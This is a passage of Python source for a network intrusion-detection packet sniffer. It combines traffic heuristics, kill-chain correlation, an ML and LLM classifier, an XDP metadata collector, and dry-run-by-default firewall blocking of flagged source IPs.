                proc = subprocess.run(av_cmd, capture_output=True, text=True, timeout=30)
                combined = "\n".join([proc.stdout or "", proc.stderr or ""])
                result["av"] = combined.strip()[:1000]
            except Exception as exc:
                result["av"] = f"scan_failed: {exc}"
        return result
class HeuristicDetector:
    """Cheap, stateful traffic heuristics (entropy, DGA-likeness, fan-out, DNS rate).

    Per-source histories keep only the newest 128 ``(timestamp, value)``
    entries, and rate scores consider just the last 60 seconds of those.
    """

    def __init__(self, logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)
        self.conn_history: Dict[str, deque] = defaultdict(lambda: deque(maxlen=128))
        self.dns_history: Dict[str, deque] = defaultdict(lambda: deque(maxlen=128))

    @staticmethod
    def entropy(payload: bytes) -> float:
        """Shannon entropy of *payload* in bits per byte (0.0 for empty input, max 8.0).

        Uses math.log2 so the heuristic works whether or not numpy is
        installed (a numpy-only version degraded to 0.0 without it).
        """
        import math

        if not payload:
            return 0.0
        total = len(payload)
        return sum((count / total) * math.log2(total / count) for count in Counter(payload).values())

    def score_dga_like(self, domain: str) -> float:
        """Score 0..1 how algorithmically generated the first label of *domain* looks.

        Labels shorter than 12 characters score 0. Digits, characters outside
        ``[a-z0-9-]`` and consonant/vowel imbalance raise the score.
        """
        if not domain:
            return 0.0
        label = domain.split(".")[0].lower()
        if len(label) < 12:
            return 0.0
        consonants = sum(ch in "bcdfghjklmnpqrstvwxyz" for ch in label)
        vowels = sum(ch in "aeiou" for ch in label)
        digit_ratio = sum(ch.isdigit() for ch in label) / max(len(label), 1)
        weird_ratio = sum(ch not in string.ascii_lowercase + string.digits + "-" for ch in label) / max(len(label), 1)
        imbalance = abs(consonants - vowels) / max(len(label), 1)
        return min(1.0, digit_ratio * 0.6 + weird_ratio * 0.8 + imbalance)

    def track_connect(self, src_ip: str, dst_ip: str) -> float:
        """Record a connection; return distinct destinations in the last 60 s / 40 (capped at 1.0)."""
        now = time.time()
        history = self.conn_history[src_ip]
        history.append((now, dst_ip))
        recent = [entry for entry in history if now - entry[0] <= 60]
        unique_targets = len({entry[1] for entry in recent})
        return min(1.0, unique_targets / 40.0)

    def track_dns(self, src_ip: str, domain: str) -> float:
        """Record a DNS query; return queries in the last 60 s / 80 (capped at 1.0)."""
        now = time.time()
        history = self.dns_history[src_ip]
        history.append((now, domain))
        recent = [entry for entry in history if now - entry[0] <= 60]
        return min(1.0, len(recent) / 80.0)
class SessionCorrelator:
    """Per-host event timeline used to spot a dns_query -> connect -> download -> execute chain.

    Each host keeps its newest 256 events.
    """

    # Kill-chain stages, in the order they must occur.
    KILL_CHAIN_STAGES = ("dns_query", "connect", "download", "execute")

    def __init__(self, logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)
        self.events: Dict[str, deque] = defaultdict(lambda: deque(maxlen=256))

    def add_event(self, host: str, kind: str, details: Dict[str, Any]) -> None:
        """Append a timestamped event of type *kind* to *host*'s timeline."""
        self.events[host].append({"ts": time.time(), "kind": kind, "details": details})

    def detect_kill_chain(self, host: str) -> bool:
        """True if *host*'s last 20 events contain every stage in order.

        Other events may sit between the stages. Comparing only the *first*
        occurrence of each kind never matched in practice: every event batch
        starts with "connect", so a "connect" almost always precedes the first
        "dns_query".
        """
        events = list(self.events.get(host, ()))
        if len(events) < 3:
            return False
        remaining = iter(event["kind"] for event in events[-20:])
        # `stage in remaining` consumes the iterator through the match, so each
        # later stage must appear after the previous one (ordered subsequence).
        return all(stage in remaining for stage in self.KILL_CHAIN_STAGES)
class MLClassifier:
    """Line-rate fast-path classifier over byte/token feature vectors.

    Accepts either a v2 bundle (``{"model", "feature_names", "version"}``, as
    written by train_ml_model()) or a bare estimator from older versions. If
    no model can be loaded, a token / magic-bytes / entropy heuristic is used.
    """

    # Attack tokens too common in benign traffic to flag on their own.
    _NOISY_TOKENS = (b";", b"|", b"--", b"select ")

    def __init__(self, model_path: str = "model.pkl", logger: Optional[logging.Logger] = None) -> None:
        self.logger = logger or logging.getLogger(__name__)
        self.model = None
        self.feature_names = FEATURE_NAMES
        try:
            import joblib
            # NOTE(security): joblib.load unpickles arbitrary objects -- only
            # point --model-path at model files you trust.
            bundle = joblib.load(model_path)
            if not (isinstance(bundle, dict) and "model" in bundle):
                self.model = bundle  # legacy bare estimator
                self.logger.info("Legacy ML model loaded from %s", model_path)
            else:
                self.model = bundle["model"]
                self.feature_names = bundle.get("feature_names", self.feature_names)
                self.logger.info("ML model v%s loaded from %s (%d features)",
                                 bundle.get("version", "?"), model_path,
                                 len(self.feature_names or []))
        except Exception as e:
            self.logger.error("Failed to load ML model from %s: %s (using heuristic fallback)",
                              model_path, e)

    def extract_features(self, payload: bytes) -> "np.ndarray":
        """Return a 1 x N float feature matrix for *payload*."""
        vector = compute_feature_vector(payload)
        return np.array([vector], dtype=float)

    def _heuristic(self, payload: bytes) -> bool:
        """Fallback verdict: a distinctive attack token, PE/SMB magic, or a
        large (>2000 bytes), high-entropy (>7.3 bits/byte) payload."""
        lowered = payload.lower()
        if any(tok in lowered for tok, _name in ATTACK_TOKENS if tok not in self._NOISY_TOKENS):
            return True
        if payload[:2] == b"MZ" or payload[:4] in (b"\xfeSMB", b"\xffSMB"):
            return True
        return bool(len(payload) > 2000 and shannon_entropy(payload[:4096]) > 7.3)

    def classify(self, payload: bytes) -> bool:
        """True if *payload* looks malicious; the model first, heuristic on failure."""
        if self.model is None:
            return self._heuristic(payload)
        try:
            prediction = self.model.predict(self.extract_features(payload))
            self.logger.debug("ML model prediction: %s", prediction)
            return bool(prediction[0])
        except Exception as exc:
            self.logger.debug("ML predict failed (%s); using heuristic.", exc)
        return self._heuristic(payload)

    @staticmethod
    def train_model(dataset_path: str, model_output_path: str, logger: Optional[logging.Logger] = None) -> None:
        """Compatibility wrapper around train_ml_model()."""
        train_ml_model(model_output_path=model_output_path, csv_path=dataset_path, logger=logger)
def get_local_process_info(port: int) -> str:
    """Return the PID (as a string) owning a local inet socket bound to *port*.

    Returns "N/A" when no socket matches, when the owning PID is not visible,
    or when psutil cannot enumerate connections. psutil raises AccessDenied
    for unprivileged callers on some platforms, e.g. macOS, and that used to
    propagate and abort alert logging. Returns "N/A (psutil not installed)"
    if psutil is missing.
    """
    try:
        import psutil
    except ImportError:
        return "N/A (psutil not installed)"
    try:
        connections = psutil.net_connections(kind="inet")
    except (psutil.Error, OSError):
        return "N/A"
    for conn in connections:
        if conn.laddr and conn.laddr.port == port:
            return str(conn.pid) if conn.pid is not None else "N/A"
    return "N/A"
class XDPCollector:
# Compiles a small eBPF program with BCC, attaches it to an interface's XDP
# hook, and stores per-packet IPv4 metadata in the module-level global
# last_xdp_metadata (only the most recent packet is kept). The program always
# returns XDP_PASS, so it observes traffic without dropping anything.
def __init__(self, interface: str, logger: Optional[logging.Logger] = None) -> None:
# Raises ImportError when BCC could not be imported (BPF is None).
# Compiling/attaching presumably needs root or CAP_BPF -- TODO confirm.
if BPF is None:
raise ImportError("BCC BPF module is not available. Please install bcc.")
self.logger = logger or logging.getLogger(__name__)
self.interface = interface
self.bpf = BPF(text=self._bpf_program())
func = self.bpf.load_func("xdp_prog", BPF.XDP)
# flags=0: no explicit XDP mode flags requested.
self.bpf.attach_xdp(self.interface, func, 0)
self.logger.info("XDP program attached on interface %s", self.interface)
# Route "events" perf-buffer records to _handle_event (delivered by poll()).
self.bpf["events"].open_perf_buffer(self._handle_event)
def _bpf_program(self) -> str:
# C source for the XDP hook. For IPv4 frames it submits {pkt_len, src_ip,
# dst_ip, protocol} to the "events" perf buffer; truncated or non-IPv4 frames
# are passed through without an event. src_ip/dst_ip are copied raw from
# iphdr (ip->saddr / ip->daddr), so they reach Python as integers, not dotted quads.
return """
#include <uapi/linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
struct data_t {
u32 pkt_len;
u32 src_ip;
u32 dst_ip;
u8 protocol;
};
BPF_PERF_OUTPUT(events);
int xdp_prog(struct xdp_md *ctx) {
struct data_t data = {};
void *data_end = (void *)(long)ctx->data_end;
void *data_ptr = (void *)(long)ctx->data;
struct ethhdr *eth = data_ptr;
if (data_ptr + sizeof(*eth) > data_end)
return XDP_PASS;
if (eth->h_proto == __constant_htons(ETH_P_IP)) {
struct iphdr *ip = data_ptr + sizeof(*eth);
if ((void*)ip + sizeof(*ip) > data_end)
return XDP_PASS;
data.pkt_len = data_end - data_ptr;
data.src_ip = ip->saddr;
data.dst_ip = ip->daddr;
data.protocol = ip->protocol;
events.perf_submit(ctx, &data, sizeof(data));
}
return XDP_PASS;
}
"""
def _handle_event(self, cpu, data, size):
# Perf-buffer callback: decode the data_t record and overwrite the global
# last_xdp_metadata with it (read by get_xdp_metadata_details()).
global last_xdp_metadata
event = self.bpf["events"].event(data)
last_xdp_metadata = {
"pkt_len": event.pkt_len,
"src_ip": event.src_ip,
"dst_ip": event.dst_ip,
"protocol": event.protocol
}
self.logger.debug("XDP event: %s", last_xdp_metadata)
def poll(self):
# Deliver pending perf events to _handle_event; waits up to timeout=100
# (presumably milliseconds per BCC's perf_buffer_poll -- TODO confirm).
self.bpf.perf_buffer_poll(timeout=100)
def detach(self):
# Remove the XDP program from the interface (flags 0, matching the attach call).
self.bpf.remove_xdp(self.interface, 0)
def get_xdp_metadata_details() -> str:
    """Summarise the latest XDP event (stored by XDPCollector) on one line.

    Returns "No XDP metadata available." while the module-level
    ``last_xdp_metadata`` is empty/falsy; missing keys render as None.
    """
    meta = last_xdp_metadata
    if not meta:
        return "No XDP metadata available."
    pkt_len, src, dst, proto = (meta.get(name) for name in ("pkt_len", "src_ip", "dst_ip", "protocol"))
    return (
        f"XDP Metadata: Packet Length: {pkt_len}, "
        f"Src IP: {src}, "
        f"Dst IP: {dst}, "
        f"Protocol: {proto}"
    )
class PacketSniffer:
COMMON_PORTS = {
# Well-known port -> (short application name, description).
# identify_application() checks the destination port first, then the source port.
20: ("FTP Data", "File Transfer Protocol - Data channel"),
21: ("FTP Control", "File Transfer Protocol - Control channel"),
22: ("SSH", "Secure Shell"),
23: ("Telnet", "Telnet protocol"),
25: ("SMTP", "Simple Mail Transfer Protocol"),
53: ("DNS", "Domain Name System"),
67: ("DHCP", "DHCP Server"),
68: ("DHCP", "DHCP Client"),
80: ("HTTP", "Hypertext Transfer Protocol"),
110: ("POP3", "Post Office Protocol"),
119: ("NNTP", "Network News Transfer Protocol"),
123: ("NTP", "Network Time Protocol"),
143: ("IMAP", "Internet Message Access Protocol"),
161: ("SNMP", "Simple Network Management Protocol"),
443: ("HTTPS", "HTTP Secure"),
3306: ("MySQL", "MySQL database service"),
5432: ("PostgreSQL", "PostgreSQL database service"),
3389: ("RDP", "Remote Desktop Protocol")
}
def __init__(self, args: argparse.Namespace) -> None:
# Build every analysis component for one capture session from the parsed CLI
# arguments. Side effects: FileObjectCarver creates the carve directory;
# --expensive may warm up the local LLM and start a daemon worker thread;
# --xdp may attach an XDP program and start a daemon polling thread.
self.args = args
self.logger = logging.getLogger("PacketSniffer")
self.flagged_logger = logging.getLogger("FlaggedIPLogger")
self.dns_logger = logging.getLogger("DNSQueryLogger")
# IP enrichment used by log_flagged_ip(); ttl=3600 presumably caches lookups
# for an hour -- TODO confirm against IPLookup.
self.ip_lookup = IPLookup(ttl=3600, logger=self.logger)
self.dns_parser = DNSParser(logger=self.logger)
self.payload_parser = PayloadParser(logger=self.logger)
# Deep-inspection pipeline used by _analyze_reassembled_tcp().
self.protocol_decoder = ProtocolDecoder(logger=self.logger)
self.content_decoder = ContentDecoder(logger=self.logger)
# getattr() defaults keep namespaces that lack these options working.
self.file_carver = FileObjectCarver(logger=self.logger, output_dir=getattr(self.args, "carve_dir", "carved_objects"))
self.signature_scanner = SignatureScanner(logger=self.logger, yara_rules_path=getattr(self.args, "yara_rules", ""))
self.heuristics = HeuristicDetector(logger=self.logger)
self.correlator = SessionCorrelator(logger=self.logger)
self.reassembler = TCPStreamReassembler(logger=self.logger)
# Runs coroutines (e.g. the IP lookups in log_flagged_ip) from this synchronous code.
self.async_runner = AsyncRunner()
# IPs already handed to block_ip(); it uses this set to skip duplicates.
self._blocked_ips: set = set()
# --expensive state. The queue and worker thread exist only when a labeler was obtained.
# NOTE(review): if get_llm_labeler() returns None, _llm_queue stays None while
# packet_handler() still calls self._llm_queue.put_nowait() whenever
# args.expensive is set -- confirm get_llm_labeler() cannot return None here.
self.llm_labeler = None
self._llm_queue: Optional[queue.Queue] = None
self._llm_dropped = 0  # jobs discarded because the LLM queue was full
if getattr(self.args, "expensive", False):
self.llm_labeler = get_llm_labeler(self.args, logger=self.logger)
if self.llm_labeler is not None:
self.logger.info("Warming up local LLM (downloads/caches on first run)...")
self.llm_labeler.warmup()
# Non-blocking analysis: the capture callback enqueues work and the
# worker thread runs the (slow) LLM so packet capture never stalls.
self._llm_queue = queue.Queue(maxsize=256)
self._llm_worker_thread = threading.Thread(target=self._llm_worker_loop, daemon=True)
self._llm_worker_thread.start()
# ml_classifier exists only in --sentry mode; users check self.args.sentry first.
if self.args.sentry:
self.ml_classifier = MLClassifier(model_path=self.args.model_path, logger=self.logger)
# --xdp is silently ignored when BCC could not be imported (BPF is None);
# setup failures are logged and capture continues without XDP.
self.xdp_collector = None
if self.args.xdp and BPF is not None:
try:
self.xdp_collector = XDPCollector(self.args.interface, logger=self.logger)
self.xdp_thread = threading.Thread(target=self._poll_xdp, daemon=True)
self.xdp_thread.start()
except Exception as e:
self.logger.exception("Failed to initialize XDPCollector: %s", e)
def _risk_from_signals(self, signature_hits: List[str], heuristic_score: float, ml_flag: bool) -> float:
    """Blend detector outputs into a risk score in [0, 1].

    Components: each signature hit adds 0.2 (max 0.6); the heuristic score
    contributes up to 0.3; an ML positive adds a flat 0.3.
    """
    signature_part = min(0.6, 0.2 * len(signature_hits))
    heuristic_part = min(0.3, heuristic_score * 0.3)
    ml_part = 0.3 if ml_flag else 0.0
    return min(1.0, signature_part + heuristic_part + ml_part)
def _emit_session_events(self, src_ip: str, dst_ip: str, decoded: Dict[str, Any], carved: Optional[Dict[str, Any]]) -> None:
    """Record what this flow update means for *src_ip* in the session correlator.

    Always records a "connect". A DNS query name adds "dns_query", a carved
    object adds "download", and a carved PE additionally adds "execute".
    """
    record = self.correlator.add_event
    protocol = decoded.get("protocol", "unknown")
    record(src_ip, "connect", {"dst_ip": dst_ip, "protocol": protocol})
    query = decoded.get("query")
    if protocol == "dns" and query:
        record(src_ip, "dns_query", {"query": query})
    if carved is None:
        return
    record(src_ip, "download", {"sha256": carved.get("sha256"), "path": carved.get("path")})
    if carved.get("container") == "pe":
        record(src_ip, "execute", {"container": carved.get("container")})
def _analyze_reassembled_tcp(self, src_ip: str, src_port: int, dst_ip: str, dst_port: int, tcp_seq: int, payload: bytes) -> None:
    """Run the deep-inspection pipeline on the TCP stream this segment extends.

    The pipeline runs these steps in order:

    - reassemble the segment;
    - decode the newest 64 KiB of that direction's stream;
    - undo HTTP encodings, or try base64;
    - YARA-scan the candidate bytes and carve/scan files;
    - compute heuristics and an optional ML verdict;
    - update session correlation.

    An ADVANCED DETECTION ALERT is logged when the risk is >= 0.7 or a kill
    chain is seen. In --sentry mode the source IP is then passed to block_ip().
    Segments that add no new contiguous bytes (retransmissions, gaps) are ignored.
    """
    if not payload:
        return
    reassembled = self.reassembler.add_tcp_segment(src_ip, src_port, dst_ip, dst_port, tcp_seq, payload)
    if reassembled.get("bytes_added", 0) == 0:
        return
    flow_key: FlowKey = reassembled["flow_key"]
    # NOTE: "c2s"/"s2c" follow canonical_flow_key's endpoint ordering, not who
    # initiated the connection; the stream chosen is the one this segment grew.
    direction = "c2s" if reassembled.get("is_client_to_server") else "s2c"
    stream_payload = reassembled["client_stream"] if direction == "c2s" else reassembled["server_stream"]
    tail = stream_payload[-65536:]
    decoded = self.protocol_decoder.decode_by_ports_or_signature(src_port, dst_port, tail, direction)
    protocol = decoded.get("protocol", "unknown")
    is_dns = protocol == "dns"
    signature_hits: List[str] = []
    candidate_payload = tail
    if protocol == "http1":
        candidate_payload = self.content_decoder.decode_http_content(decoded)
    else:
        b64 = self.content_decoder.try_base64(tail)
        if b64:
            candidate_payload = b64
    signature_hits.extend(self.signature_scanner.scan_bytes(candidate_payload))
    carved = self.file_carver.carve(flow_key, candidate_payload, source=direction)
    file_scan: Dict[str, Any] = {"yara": [], "av": "not_run"}
    if carved is not None:
        file_scan = self.signature_scanner.scan_file(carved["path"])
        signature_hits.extend(file_scan.get("yara", []))
    entropy_score = 1.0 if self.heuristics.entropy(candidate_payload[:4096]) >= 7.3 else 0.0
    query = decoded.get("query", "") if is_dns else ""
    dga_score = self.heuristics.score_dga_like(query) if is_dns else 0.0
    beacon_score = self.heuristics.track_connect(src_ip, dst_ip)
    # The DNS query-rate score used to be computed and thrown away; it now
    # contributes to the heuristic score like the others.
    dns_rate_score = self.heuristics.track_dns(src_ip, query) if is_dns else 0.0
    heuristic_score = min(1.0, max(entropy_score, dga_score, beacon_score, dns_rate_score))
    ml_flag = False
    if self.args.sentry:
        ml_flag = self.ml_classifier.classify(candidate_payload)
    risk = self._risk_from_signals(signature_hits, heuristic_score, ml_flag)
    self._emit_session_events(src_ip, dst_ip, decoded, carved)
    kill_chain = self.correlator.detect_kill_chain(src_ip)
    tls_meta = {}
    if protocol == "tls":
        tls_meta = {
            "sni": decoded.get("sni", ""),
            "ja3": decoded.get("ja3", ""),
            "ja3_hash": decoded.get("ja3_hash", ""),
        }
    if risk >= 0.7 or kill_chain:
        message = (
            "\n====== ADVANCED DETECTION ALERT ======\n"
            f"Flow: {src_ip}:{src_port} -> {dst_ip}:{dst_port}\n"
            f"Protocol: {protocol}\n"
            f"Risk Score: {risk:.2f}\n"
            f"Signatures: {signature_hits}\n"
            f"Heuristic Score: {heuristic_score:.2f}\n"
            f"ML Flag: {ml_flag}\n"
            f"TLS Metadata: {tls_meta}\n"
            f"Carved Object: {carved}\n"
            f"File Scan: {file_scan}\n"
            f"Kill Chain Detected: {kill_chain}\n"
            "======================================\n"
        )
        self.flagged_logger.warning(message)
        if self.args.sentry:
            self.block_ip(src_ip)
def _poll_xdp(self):
    """Daemon-thread loop that keeps pumping XDP perf events into the collector.

    Waits instead of spinning when there is no collector. After a polling
    error it backs off for a second, so a persistent failure (e.g. a detached
    program) cannot peg a CPU core or flood the log.
    """
    while True:
        collector = self.xdp_collector
        if collector is None:
            time.sleep(0.5)
            continue
        try:
            collector.poll()
        except Exception as e:
            self.logger.exception("Error polling XDP events: %s", e)
            time.sleep(1.0)
def _llm_worker_loop(self) -> None:
    """Consume --expensive jobs forever, running the slow LLM off the capture thread.

    A failing job is logged and skipped. Every job is acknowledged with
    task_done() so ``queue.join()`` callers are never left waiting.
    """
    def run_one(item) -> None:
        try:
            self._process_llm_job(item)
        except Exception as exc:
            self.logger.exception("LLM worker error: %s", exc)
        finally:
            self._llm_queue.task_done()

    while True:
        run_one(self._llm_queue.get())
def _process_llm_job(self, job: Dict[str, Any]) -> None:
    """Classify one queued packet with the LLM and act on the verdict.

    ``label == 1`` (malicious) logs a warning, raises a flagged-IP alert and
    calls block_ip() on the source. Any other label is logged as benign.
    """
    src_ip = job["src"]
    label, details = classify_packet_llm(
        self.llm_labeler,
        self.args.llm_backend,
        summary=job["summary"],
        normalized_payload=job["normalized"],
        hex_payload=job["hex"],
        packet_details=job["details"],
        protocol=job["protocol"],
        src=src_ip,
        dst=job["dst"],
        entropy=job["entropy"],
        logger=self.logger,
    )
    if label != 1:
        self.logger.info("Expensive Mode: %s -> benign (%s)",
                         src_ip, details.get("reason", ""))
        return
    self.logger.warning(
        "Expensive Mode: %s -> MALICIOUS (%s, conf=%.2f): %s",
        src_ip,
        details.get("category", "?"),
        details.get("confidence", 0.0),
        details.get("reason", ""),
    )
    category = details.get('category', 'malicious')
    self.log_flagged_ip(job["packet"], flagged_signatures=[], app_name="Expensive Mode",
                        app_details=f"LLM:{category}")
    self.block_ip(src_ip)
def identify_application(self, src_port: int, dst_port: int) -> Tuple[str, str]:
    """Map a port pair to ``(name, description)`` via COMMON_PORTS.

    The destination port wins over the source port; unknown pairs give
    ``("Unknown", "Unknown application protocol")``.
    """
    known = self.COMMON_PORTS
    return next(
        (known[port] for port in (dst_port, src_port) if port in known),
        ("Unknown", "Unknown application protocol"),
    )
def block_ip(self, ip: str) -> None:
    """Block an IP via the host firewall.

    Validates the address, which prevents command injection from spoofed
    source IPs, and normalizes it so equivalent spellings deduplicate. Each
    new IP is recorded in ``blocked_ips.log``. Real firewall rules are only
    applied when ``--enforce`` is set; otherwise the action is a dry run so
    the operator can review it before enforcing.

    Backends:
        Windows: ``netsh advfirewall``.
        Linux: ``iptables``, or ``ip6tables`` for IPv6 addresses.
        Other platforms, including macOS (pf, not iptables): only an error is logged.
    """
    try:
        ip_obj = ipaddress.ip_address(ip)
    except ValueError:
        self.logger.warning("Refusing to block invalid IP: %r", ip)
        return
    ip = str(ip_obj)
    if ip in self._blocked_ips:
        return
    self._blocked_ips.add(ip)
    try:
        with open("blocked_ips.log", "a", encoding="utf-8") as fh:
            fh.write(f"{datetime.now(timezone.utc).isoformat()} {ip}\n")
    except OSError as exc:
        # Losing the audit line must not take down the capture path.
        self.logger.error("Could not record %s in blocked_ips.log: %s", ip, exc)
    if not getattr(self.args, "enforce", False):
        self.logger.warning("[DRY-RUN] Would block IP %s "
                            "(pass --enforce to apply a firewall rule).", ip)
        return
    system = detect_operating_system()
    try:
        if system == "windows":
            rule = f"PacketSniffer block {ip}"
            cmd = ["netsh", "advfirewall", "firewall", "add", "rule",
                   f"name={rule}", "dir=in", "action=block", f"remoteip={ip}"]
        elif system == "linux":
            tool = "ip6tables" if ip_obj.version == 6 else "iptables"
            cmd = [tool, "-A", "INPUT", "-s", ip, "-j", "DROP"]
        else:
            self.logger.error("No firewall backend for platform %s", system)
            return
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=15)
        if proc.returncode == 0:
            self.logger.warning("ENFORCED firewall block on %s", ip)
        else:
            self.logger.error("Firewall block of %s failed (rc=%s): %s",
                              ip, proc.returncode, (proc.stderr or "").strip()[:200])
    except Exception as exc:
        self.logger.exception("Error applying firewall block for %s: %s", ip, exc)
def _is_noisy_discovery_traffic(self, packet) -> bool:
    """True for IPv4 UDP sent from a private address to multicast or broadcast.

    Such traffic (local service discovery) is excluded from signature alerts.
    Anything else, including unparseable addresses, returns False.
    """
    if not packet.haslayer(IP):
        return False
    ip_layer = packet[IP]
    dst_text = ip_layer.dst
    try:
        src_addr = ipaddress.ip_address(ip_layer.src)
        dst_addr = ipaddress.ip_address(dst_text)
    except ValueError:
        return False
    if not packet.haslayer(UDP):
        return False
    fan_out = dst_addr.is_multicast or dst_text == "255.255.255.255"
    return src_addr.is_private and fan_out
def log_flagged_ip(self, packet, flagged_signatures: List[Tuple[str, str]],
                   app_name: str, app_details: str) -> None:
    """Emit a FLAGGED IP ALERT for *packet* on the flagged-IP logger.

    The alert includes:

    - IPv4/IPv6 endpoints and TCP/UDP ports;
    - the PID bound to the destination port (get_local_process_info);
    - hostname/city/region/country/org background for the source IP from
      ``self.ip_lookup``, waiting at most 6 s. The lookup is skipped when
      the packet has no IP layer.
    """
    import concurrent.futures

    source_ip = "Unknown"
    dest_ip = "Unknown"
    port_info = ""
    process_id = "N/A"
    if packet.haslayer(IP):
        source_ip = packet[IP].src
        dest_ip = packet[IP].dst
    elif packet.haslayer(IPv6):
        source_ip = packet[IPv6].src
        dest_ip = packet[IPv6].dst
    if packet.haslayer(TCP):
        tcp_layer = packet[TCP]
        port_info = f"TCP src: {tcp_layer.sport}, dst: {tcp_layer.dport}"
        process_id = get_local_process_info(tcp_layer.dport)
    elif packet.haslayer(UDP):
        udp_layer = packet[UDP]
        port_info = f"UDP src: {udp_layer.sport}, dst: {udp_layer.dport}"
        process_id = get_local_process_info(udp_layer.dport)
    ip_background = "No background info available."
    if source_ip != "Unknown":
        future = self.async_runner.run_coroutine(self.ip_lookup.get_ip_info(source_ip))
        try:
            info = future.result(timeout=6)
            if info:
                ip_background = "\n".join([f"{k.capitalize()}: {v}" for k, v in info.items() if k in ("hostname", "city", "region", "country", "org")])
        except concurrent.futures.TimeoutError:
            # A slow lookup is routine: note it without a traceback and request
            # cancellation instead of leaving the lookup running.
            future.cancel()
            self.logger.warning("IP background lookup for %s timed out", source_ip)
        except Exception as e:
            self.logger.exception("Error retrieving IP background info: %s", e)
    message = (
        "\n====== FLAGGED IP ALERT ======\n"
        f"Source IP: {source_ip}\n"
        f"Destination IP: {dest_ip}\n"
        f"Application: {app_name} ({app_details})\n"
        f"Port Info: {port_info}\n"
        f"Process ID: {process_id}\n"
        f"IP Background:\n{ip_background}\n"
        f"Flagged Signatures: {flagged_signatures}\n"
        "===============================\n"
    )
    self.flagged_logger.warning(message)
def parse_payload(self, packet, app_name: str, payload: bytes) -> None:
# Inspect one packet payload. In --sentry mode the ML classifier runs first,
# and a malicious verdict blocks the source IP via block_ip(). Hex-signature
# hits (analyze_hex_dump) raise a flagged-IP alert unless the packet is local
# discovery noise. The payload is then logged through an application-specific
# parser: HTTP text, the first 64 bytes of HTTPS as hex, DNS, or plain text.
if self.args.sentry:
if self.ml_classifier.classify(payload):
# NOTE(review): only packet[IP] is consulted, so IPv6 sources become
# "unknown", which block_ip() rejects as invalid -- IPv6 offenders are
# never blocked on this path.
src_ip = packet[IP].src if packet.haslayer(IP) else "unknown"
self.logger.warning("Sentry mode: payload classified as malicious. Blocking IP %s", src_ip)
self.block_ip(src_ip)
return
self.logger.info("Parsing payload for application: %s", app_name)
flagged_signatures = self.payload_parser.analyze_hex_dump(payload)
if flagged_signatures and not self._is_noisy_discovery_traffic(packet):
# Ports default to 0 when the packet has neither TCP nor UDP.
app_info = self.identify_application(
packet[TCP].sport if packet.haslayer(TCP) else (packet[UDP].sport if packet.haslayer(UDP) else 0),
packet[TCP].dport if packet.haslayer(TCP) else (packet[UDP].dport if packet.haslayer(UDP) else 0)
)
self.log_flagged_ip(packet, flagged_signatures, app_name, app_info[1])
if app_name == "HTTP":
self.payload_parser.parse_http_payload(payload)
elif app_name == "HTTPS":
self.payload_parser.parse_tls_payload(payload[:64])
elif app_name == "DNS":
self.dns_parser.parse_dns_payload(payload)
else:
self.payload_parser.parse_text_payload(payload)
def packet_handler(self, packet) -> None:
    """Per-packet scapy callback: filter, log, and dispatch one captured packet.

    In ``--expensive`` mode, a packet carrying a Raw payload is packaged into a
    job dict and handed to the LLM analysis queue without blocking (dropped and
    counted when the queue is full); no further processing happens for it.

    Otherwise the packet is:
      1. dropped unless it has an IPv4/IPv6 layer whose source matches the
         --local-only policy (private sources only with --local-only, public
         sources only without it);
      2. in --red-alert mode, dropped when the looked-up source country is
         in ``args.whitelist``;
      3. logged (summary, DNS queries, Ethernet/ARP/IP headers);
      4. dispatched by transport: TCP (reassembly, then TLS metadata or
         parse_payload), UDP (DNS correlation, then parse_payload), ICMP (logged).

    NOTE(review): indentation in this copy of the file was lost; the nesting
    below is a reconstruction -- confirm against the original source.
    """
    if self.args.expensive and packet.haslayer(Raw):
        payload = bytes(packet[Raw].load)
        normalized_payload = self.payload_parser.normalize_payload(payload)
        hex_payload = payload.hex()
        packet_summary = packet.summary()
        protocol = ""
        if packet.haslayer(TCP):
            protocol = self.identify_application(packet[TCP].sport, packet[TCP].dport)[0]
        elif packet.haslayer(UDP):
            protocol = self.identify_application(packet[UDP].sport, packet[UDP].dport)[0]
        # IPv6-only packets are reported as "unknown" here.
        src_ip = packet[IP].src if packet.haslayer(IP) else "unknown"
        dst_ip = packet[IP].dst if packet.haslayer(IP) else "unknown"
        entropy = self.heuristics.entropy(payload[:4096])
        # Only the OpenAI path needs the costly scapy dump; the local path
        # uses compact structured fields instead.
        packet_details = packet.show(dump=True) if self.args.llm_backend == "openai" else ""
        job = {
            "packet": packet, "summary": packet_summary, "normalized": normalized_payload,
            "hex": hex_payload, "details": packet_details, "protocol": protocol,
            "src": src_ip, "dst": dst_ip, "entropy": entropy,
        }
        # Enqueue without blocking the capture loop; drop (and count) if the
        # analyzer is saturated rather than stalling capture.
        try:
            self._llm_queue.put_nowait(job)
        except queue.Full:
            self._llm_dropped += 1
            # Rate-limit the warning: log on the 1st, 51st, 101st ... drop.
            if self._llm_dropped % 50 == 1:
                self.logger.warning("LLM analysis queue full; dropped %d packets so far "
                                    "(CPU LLM can't keep up at this rate).", self._llm_dropped)
        return
    # Source-address policy: --local-only keeps private sources, otherwise
    # only public sources are processed. Packets without IP/IPv6 stop here.
    ip_str = None
    if packet.haslayer(IP):
        ip_str = packet[IP].src
        ip_obj = ipaddress.ip_address(ip_str)
        if self.args.local_only and not ip_obj.is_private:
            return
        if not self.args.local_only and ip_obj.is_private:
            return
    elif packet.haslayer(IPv6):
        ip_str = packet[IPv6].src
        ip_obj = ipaddress.ip_address(ip_str)
        if self.args.local_only and not ip_obj.is_private:
            return
        if not self.args.local_only and ip_obj.is_private:
            return
    else:
        self.logger.warning("Packet without IP/IPv6 layer")
        return
    if not self.args.local_only and self.args.red_alert:
        # Synchronous wait (up to 6 s) on the capture callback for every packet,
        # unless get_ip_info caches results -- not visible here.
        future = self.async_runner.run_coroutine(self.ip_lookup.get_ip_info(ip_str))
        try:
            ip_info = future.result(timeout=6)
            country = ip_info.get("country", "").upper()
            # NOTE(review): --whitelist is declared as a comma-separated str; if it
            # is not split into a collection upstream, this is a substring test
            # and an empty country ("") always matches -- confirm.
            if country in self.args.whitelist:
                self.logger.info("Skipping packet from whitelisted country: %s", country)
                return
        except Exception as e:
            self.logger.exception("Error during red alert IP filtering: %s", e)
    self.logger.info("=" * 80)
    self.logger.info("Packet: %s", packet.summary())
    # Fallback DNS extraction from scapy's one-line summary text.
